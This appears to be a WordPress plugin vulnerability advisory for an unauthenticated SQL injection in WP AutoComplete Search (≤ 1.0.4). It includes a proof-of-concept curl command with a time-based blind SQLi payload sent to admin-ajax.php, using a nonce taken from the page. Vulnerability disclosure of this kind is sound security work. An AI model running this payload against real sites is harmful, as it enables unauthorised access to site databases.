WordPress Plugin Vulnerabilities
WP AutoComplete Search <= 1.0.4 - Unauthenticated SQLi
Description
The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users, leading to an unauthenticated SQL injection
Proof of Concept
Extract the nonce from the index page (search for "wp_autosearch_config", look for the "nonce" field) Invoke the following curl command, with the nonce in place, to induce a 5 second sleep: time curl -i 'https://example.com/wp-admin/admin-ajax.php' \ --data 'action=wi_get_search_results&security=NONCE&q=123" AND (SELECT 1 FROM (SELECT(SLEEP(5)))HIdl)-- CmWf'
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-12-12 (about 1 years ago)
Added
2022-12-12 (about 1 years ago)
Last Updated
2022-12-12 (about 1 years ago)